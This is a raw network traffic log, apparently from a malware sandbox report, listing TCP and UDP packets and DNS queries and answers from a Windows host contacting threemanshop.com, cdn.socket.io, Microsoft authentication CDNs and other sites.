Apr 18, 2024 23:27:11.688385010 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.688410044 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.688445091 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.688467979 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.688497066 CEST	49753	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:11.692749023 CEST	443	49752	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.692960024 CEST	443	49752	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.693013906 CEST	49752	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.696162939 CEST	49752	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.696187019 CEST	443	49752	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.696453094 CEST	49753	443	192.168.2.4	152.199.4.44
Apr 18, 2024 23:27:11.696470022 CEST	443	49753	152.199.4.44	192.168.2.4
Apr 18, 2024 23:27:11.697067022 CEST	49751	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.697124958 CEST	443	49751	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.697298050 CEST	49750	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.697360992 CEST	443	49750	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.698987007 CEST	49754	443	192.168.2.4	72.21.91.237
Apr 18, 2024 23:27:11.699013948 CEST	443	49754	72.21.91.237	192.168.2.4
Apr 18, 2024 23:27:11.762852907 CEST	443	49756	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.764086008 CEST	49756	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.764131069 CEST	443	49756	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.767518044 CEST	443	49756	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.767605066 CEST	49756	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.767935991 CEST	49756	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.768023968 CEST	443	49756	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.768049955 CEST	49756	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.808135033 CEST	443	49756	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.809220076 CEST	49756	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.809232950 CEST	443	49756	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.856663942 CEST	49756	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.971415997 CEST	443	49756	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.971599102 CEST	443	49756	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:11.971673012 CEST	49756	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.998931885 CEST	49756	443	192.168.2.4	13.107.246.41
Apr 18, 2024 23:27:11.998954058 CEST	443	49756	13.107.246.41	192.168.2.4
Apr 18, 2024 23:27:14.143557072 CEST	49763	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.143614054 CEST	443	49763	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.143754959 CEST	49763	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.145590067 CEST	49763	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.145608902 CEST	443	49763	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.364949942 CEST	49764	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:27:14.365017891 CEST	443	49764	64.233.177.106	192.168.2.4
Apr 18, 2024 23:27:14.365134954 CEST	49764	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:27:14.369617939 CEST	49764	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:27:14.369637012 CEST	443	49764	64.233.177.106	192.168.2.4
Apr 18, 2024 23:27:14.372235060 CEST	443	49763	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.372389078 CEST	49763	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.377711058 CEST	49763	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.377739906 CEST	443	49763	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.378156900 CEST	443	49763	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.418764114 CEST	49763	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.467219114 CEST	49763	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.508153915 CEST	443	49763	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.573018074 CEST	443	49763	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.573195934 CEST	443	49763	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.573476076 CEST	49763	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.573545933 CEST	49763	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.573545933 CEST	49763	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.573569059 CEST	443	49763	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.573580980 CEST	443	49763	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.599019051 CEST	443	49764	64.233.177.106	192.168.2.4
Apr 18, 2024 23:27:14.599575996 CEST	49764	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:27:14.599632978 CEST	443	49764	64.233.177.106	192.168.2.4
Apr 18, 2024 23:27:14.601290941 CEST	443	49764	64.233.177.106	192.168.2.4
Apr 18, 2024 23:27:14.601428986 CEST	49764	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:27:14.608998060 CEST	49764	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:27:14.609179020 CEST	443	49764	64.233.177.106	192.168.2.4
Apr 18, 2024 23:27:14.629024029 CEST	49765	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.629107952 CEST	443	49765	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.629894972 CEST	49765	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.630311012 CEST	49765	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.630333900 CEST	443	49765	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.655263901 CEST	49764	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:27:14.655319929 CEST	443	49764	64.233.177.106	192.168.2.4
Apr 18, 2024 23:27:14.700145006 CEST	49764	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:27:14.847501040 CEST	443	49765	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.847604990 CEST	49765	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.849497080 CEST	49765	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.849525928 CEST	443	49765	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.849869967 CEST	443	49765	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:14.851480007 CEST	49765	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:14.892154932 CEST	443	49765	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:15.055704117 CEST	443	49765	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:15.055864096 CEST	443	49765	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:15.056027889 CEST	49765	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:15.057027102 CEST	49765	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:15.057027102 CEST	49765	443	192.168.2.4	23.220.189.216
Apr 18, 2024 23:27:15.057044983 CEST	443	49765	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:15.057055950 CEST	443	49765	23.220.189.216	192.168.2.4
Apr 18, 2024 23:27:21.777117968 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:21.777154922 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:21.777256012 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:21.780864000 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:21.780881882 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:22.414685011 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:22.414779902 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:22.418904066 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:22.418916941 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:22.419315100 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:22.513029099 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:22.606149912 CEST	49672	443	192.168.2.4	173.222.162.32
Apr 18, 2024 23:27:22.606175900 CEST	443	49672	173.222.162.32	192.168.2.4
Apr 18, 2024 23:27:22.606410980 CEST	49672	443	192.168.2.4	173.222.162.32
Apr 18, 2024 23:27:22.606420994 CEST	443	49672	173.222.162.32	192.168.2.4
Apr 18, 2024 23:27:22.944236040 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:22.992160082 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:23.353710890 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:23.353770018 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:23.353792906 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:23.353827953 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:23.353847980 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:23.353863955 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:23.353869915 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:23.353894949 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:23.353899002 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:23.353913069 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:23.353929996 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:23.353950024 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:23.353964090 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:23.354089975 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:23.354157925 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:23.354170084 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:23.354279995 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:23.354336023 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:23.372662067 CEST	49767	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:27:23.372674942 CEST	443	49767	40.68.123.157	192.168.2.4
Apr 18, 2024 23:27:24.589704990 CEST	443	49764	64.233.177.106	192.168.2.4
Apr 18, 2024 23:27:24.589828014 CEST	443	49764	64.233.177.106	192.168.2.4
Apr 18, 2024 23:27:24.589878082 CEST	49764	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:27:24.773777008 CEST	443	49736	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:24.773849964 CEST	443	49736	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:24.773998022 CEST	49736	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:25.530316114 CEST	49736	443	192.168.2.4	172.67.202.97
Apr 18, 2024 23:27:25.530349016 CEST	443	49736	172.67.202.97	192.168.2.4
Apr 18, 2024 23:27:25.530358076 CEST	49764	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:27:25.530381918 CEST	443	49764	64.233.177.106	192.168.2.4
Apr 18, 2024 23:27:39.771110058 CEST	443	49735	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:39.771302938 CEST	443	49735	108.156.152.88	192.168.2.4
Apr 18, 2024 23:27:39.771380901 CEST	49735	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:41.536676884 CEST	49735	443	192.168.2.4	108.156.152.88
Apr 18, 2024 23:27:41.536712885 CEST	443	49735	108.156.152.88	192.168.2.4
Apr 18, 2024 23:28:00.460588932 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:00.460642099 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:00.461106062 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:00.461752892 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:00.461787939 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.090116024 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.090236902 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:01.094309092 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:01.094329119 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.094741106 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.103544950 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:01.144164085 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.700386047 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.700464964 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.700524092 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.700548887 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:01.700592041 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.700612068 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:01.700645924 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:01.700695038 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.700748920 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.700751066 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:01.700788975 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.700826883 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:01.700902939 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.701014042 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.701062918 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:01.704876900 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:01.704916000 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:01.704943895 CEST	49777	443	192.168.2.4	40.68.123.157
Apr 18, 2024 23:28:01.704958916 CEST	443	49777	40.68.123.157	192.168.2.4
Apr 18, 2024 23:28:14.306538105 CEST	49779	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:28:14.306629896 CEST	443	49779	64.233.177.106	192.168.2.4
Apr 18, 2024 23:28:14.306729078 CEST	49779	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:28:14.307245970 CEST	49779	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:28:14.307281017 CEST	443	49779	64.233.177.106	192.168.2.4
Apr 18, 2024 23:28:14.526948929 CEST	443	49779	64.233.177.106	192.168.2.4
Apr 18, 2024 23:28:14.527337074 CEST	49779	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:28:14.527400970 CEST	443	49779	64.233.177.106	192.168.2.4
Apr 18, 2024 23:28:14.528589010 CEST	443	49779	64.233.177.106	192.168.2.4
Apr 18, 2024 23:28:14.528908968 CEST	49779	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:28:14.529100895 CEST	443	49779	64.233.177.106	192.168.2.4
Apr 18, 2024 23:28:14.576143026 CEST	49779	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:28:24.528062105 CEST	443	49779	64.233.177.106	192.168.2.4
Apr 18, 2024 23:28:24.528136969 CEST	443	49779	64.233.177.106	192.168.2.4
Apr 18, 2024 23:28:24.528350115 CEST	49779	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:28:25.530334949 CEST	49779	443	192.168.2.4	64.233.177.106
Apr 18, 2024 23:28:25.530392885 CEST	443	49779	64.233.177.106	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 18, 2024 23:27:09.245418072 CEST	53	61470	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:09.287900925 CEST	53	53185	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:09.329412937 CEST	61232	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:09.329498053 CEST	50739	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:09.329943895 CEST	63461	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:09.330073118 CEST	61317	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:09.434468031 CEST	53	50739	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:09.434967995 CEST	53	61232	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:09.442898989 CEST	53	61317	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:09.477870941 CEST	53	63461	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:09.917656898 CEST	53	53605	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:10.314681053 CEST	63377	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:10.314785957 CEST	65290	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:10.348509073 CEST	50954	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:10.348664999 CEST	54106	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:10.351227045 CEST	52058	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:10.351407051 CEST	51625	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:10.419722080 CEST	53	63377	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:10.420902014 CEST	53	65290	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:10.453672886 CEST	53	50954	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:10.455075979 CEST	53	52058	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:10.455837011 CEST	53	51625	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:10.456216097 CEST	53	54106	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:10.456521034 CEST	53	57710	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:10.995646954 CEST	53	52154	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:11.045402050 CEST	65060	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:11.045547962 CEST	53400	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:11.048192978 CEST	53834	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:11.048541069 CEST	63571	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:11.150125980 CEST	53	53400	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:11.150585890 CEST	53	65060	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:11.153398991 CEST	53	53834	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:11.153920889 CEST	53	63571	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:14.257900000 CEST	63535	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:14.257900000 CEST	55860	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:27:14.362492085 CEST	53	63535	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:14.362531900 CEST	53	55860	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:21.762094021 CEST	53	58253	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:23.235898972 CEST	138	138	192.168.2.4	192.168.2.255
Apr 18, 2024 23:27:26.823007107 CEST	53	61056	1.1.1.1	192.168.2.4
Apr 18, 2024 23:27:45.936909914 CEST	53	56165	1.1.1.1	192.168.2.4
Apr 18, 2024 23:28:08.558300972 CEST	53	60408	1.1.1.1	192.168.2.4
Apr 18, 2024 23:28:09.154033899 CEST	53	61604	1.1.1.1	192.168.2.4
Apr 18, 2024 23:28:36.493948936 CEST	53	49429	1.1.1.1	192.168.2.4
Apr 18, 2024 23:29:21.831319094 CEST	53	58411	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 18, 2024 23:27:09.329412937 CEST	192.168.2.4	1.1.1.1	0x762	Standard query (0)	cdn.socket.io	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:09.329498053 CEST	192.168.2.4	1.1.1.1	0x4464	Standard query (0)	cdn.socket.io	65	IN (0x0001)	false
Apr 18, 2024 23:27:09.329943895 CEST	192.168.2.4	1.1.1.1	0xd0ab	Standard query (0)	threemanshop.com	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:09.330073118 CEST	192.168.2.4	1.1.1.1	0xb9c7	Standard query (0)	threemanshop.com	65	IN (0x0001)	false
Apr 18, 2024 23:27:10.314681053 CEST	192.168.2.4	1.1.1.1	0x4365	Standard query (0)	www.w3schools.com	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:10.314785957 CEST	192.168.2.4	1.1.1.1	0x92c0	Standard query (0)	www.w3schools.com	65	IN (0x0001)	false
Apr 18, 2024 23:27:10.348509073 CEST	192.168.2.4	1.1.1.1	0x1a16	Standard query (0)	ih1.redbubble.net	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:10.348664999 CEST	192.168.2.4	1.1.1.1	0x8bc	Standard query (0)	ih1.redbubble.net	65	IN (0x0001)	false
Apr 18, 2024 23:27:10.351227045 CEST	192.168.2.4	1.1.1.1	0x2441	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:10.351407051 CEST	192.168.2.4	1.1.1.1	0xff46	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
Apr 18, 2024 23:27:11.045402050 CEST	192.168.2.4	1.1.1.1	0xb666	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:11.045547962 CEST	192.168.2.4	1.1.1.1	0xe6de	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
Apr 18, 2024 23:27:11.048192978 CEST	192.168.2.4	1.1.1.1	0xdeca	Standard query (0)	ih1.redbubble.net	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:11.048541069 CEST	192.168.2.4	1.1.1.1	0x5226	Standard query (0)	ih1.redbubble.net	65	IN (0x0001)	false
Apr 18, 2024 23:27:14.257900000 CEST	192.168.2.4	1.1.1.1	0xf9c5	Standard query (0)	www.google.com	65	IN (0x0001)	false
Apr 18, 2024 23:27:14.257900000 CEST	192.168.2.4	1.1.1.1	0x80b7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 18, 2024 23:27:09.434468031 CEST	1.1.1.1	192.168.2.4	0x4464	No error (0)	cdn.socket.io	d2vgu95hoyrpkh.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:09.434967995 CEST	1.1.1.1	192.168.2.4	0x762	No error (0)	cdn.socket.io	d2vgu95hoyrpkh.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:09.434967995 CEST	1.1.1.1	192.168.2.4	0x762	No error (0)	d2vgu95hoyrpkh.cloudfront.net		108.156.152.88	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:09.434967995 CEST	1.1.1.1	192.168.2.4	0x762	No error (0)	d2vgu95hoyrpkh.cloudfront.net		108.156.152.27	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:09.434967995 CEST	1.1.1.1	192.168.2.4	0x762	No error (0)	d2vgu95hoyrpkh.cloudfront.net		108.156.152.4	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:09.434967995 CEST	1.1.1.1	192.168.2.4	0x762	No error (0)	d2vgu95hoyrpkh.cloudfront.net		108.156.152.114	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:09.442898989 CEST	1.1.1.1	192.168.2.4	0xb9c7	No error (0)	threemanshop.com			65	IN (0x0001)	false
Apr 18, 2024 23:27:09.477870941 CEST	1.1.1.1	192.168.2.4	0xd0ab	No error (0)	threemanshop.com		172.67.202.97	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:09.477870941 CEST	1.1.1.1	192.168.2.4	0xd0ab	No error (0)	threemanshop.com		104.21.44.178	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:10.419722080 CEST	1.1.1.1	192.168.2.4	0x4365	No error (0)	www.w3schools.com	cs837.wac.edgecastcdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:10.419722080 CEST	1.1.1.1	192.168.2.4	0x4365	No error (0)	cs837.wac.edgecastcdn.net		192.229.173.207	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:10.420902014 CEST	1.1.1.1	192.168.2.4	0x92c0	No error (0)	www.w3schools.com	cs837.wac.edgecastcdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:10.450885057 CEST	1.1.1.1	192.168.2.4	0x6b03	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:10.450885057 CEST	1.1.1.1	192.168.2.4	0x6b03	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:10.450885057 CEST	1.1.1.1	192.168.2.4	0x6b03	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:10.453672886 CEST	1.1.1.1	192.168.2.4	0x1a16	No error (0)	ih1.redbubble.net	cs203.wac.edgecastcdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:10.453672886 CEST	1.1.1.1	192.168.2.4	0x1a16	No error (0)	cs203.wac.edgecastcdn.net		72.21.91.237	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:10.455075979 CEST	1.1.1.1	192.168.2.4	0x2441	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:10.455075979 CEST	1.1.1.1	192.168.2.4	0x2441	No error (0)	cs1100.wpc.omegacdn.net		152.199.4.44	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:10.455802917 CEST	1.1.1.1	192.168.2.4	0xa1fb	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:10.455802917 CEST	1.1.1.1	192.168.2.4	0xa1fb	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:10.455802917 CEST	1.1.1.1	192.168.2.4	0xa1fb	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:10.455837011 CEST	1.1.1.1	192.168.2.4	0xff46	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:10.456216097 CEST	1.1.1.1	192.168.2.4	0x8bc	No error (0)	ih1.redbubble.net	cs203.wac.edgecastcdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:11.147797108 CEST	1.1.1.1	192.168.2.4	0xb82a	No error (0)	shed.dual-low.part-0013.t-0009.t-msedge.net	part-0013.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:11.147797108 CEST	1.1.1.1	192.168.2.4	0xb82a	No error (0)	part-0013.t-0009.t-msedge.net		13.107.246.41	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:11.147797108 CEST	1.1.1.1	192.168.2.4	0xb82a	No error (0)	part-0013.t-0009.t-msedge.net		13.107.213.41	A (IP address)	IN (0x0001)	false
Apr 18, 2024 23:27:11.150125980 CEST	1.1.1.1	192.168.2.4	0xe6de	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:11.150585890 CEST	1.1.1.1	192.168.2.4	0xb666	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 18, 2024 23:27:11.150585890 CEST	1.1.1.1	192.168.2.4	0xb666	No error (0)	cs1100.wpc.omegacdn.net		152.199.4.44	A (IP address)	IN (0x0001)	false
